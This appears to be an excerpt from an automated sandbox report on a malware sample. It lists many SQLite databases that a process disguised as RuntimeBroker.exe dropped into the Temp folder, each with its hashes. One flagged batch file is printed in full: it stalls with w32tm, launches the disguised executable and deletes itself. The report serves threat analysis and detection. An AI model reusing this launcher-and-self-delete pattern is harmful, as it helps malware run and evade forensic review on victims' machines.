                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RmP2p4HJJo

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RrAXcxNFr4

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\RrHzHfgNvM

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\SMc6EeBQ3A

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\SgvtxCdD9u

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\SiJw0NT8kj

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Sn3W2nJxyf

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\T0tmMS1dsj

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\T9YmGNTNUf

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):205
                                                                                                            Entropy (8bit):5.139036322887519
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE7ZxvIKOZG1wkn23fHK:HTg9uYDE7vCf/K
                                                                                                            MD5:12D582A11F3BFFA6B2895E9476794110
                                                                                                            SHA1:EED4FE7D16C0810A50DB5D4E91E02D20AF8F3D7D
                                                                                                            SHA-256:DF1116616B891890A3100EE65CACFE9ED5A2775CE126961A8927CE43E4B379B0
                                                                                                            SHA-512:5E7E16C5DE59A98CE596B293C61A629FAC36BC2A3A4DF4E13FA167F1A20E92F0CAEC7AED5FB56DACF3FA94DED59BE052B085D8F506DF91A958322F9AF36FFC9C
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\RuntimeBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TCq2JLUA0X.bat"

                                                                                                            C:\Users\user\AppData\Local\Temp\TFBbevwxIk

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\TGiaeu5Hwp

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\TO4uPenNUd

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):98304
                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\TV9SCHNbp4

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\TaZRA1J3tn

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Td7DUHgEfO

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Tk1Enj4jj8

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Tzs684hvW4

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\U4nU8XFVeX

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\UfeOvp8Hxy

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\UiVjG9VXVG

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\UqbuAsOuLz

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
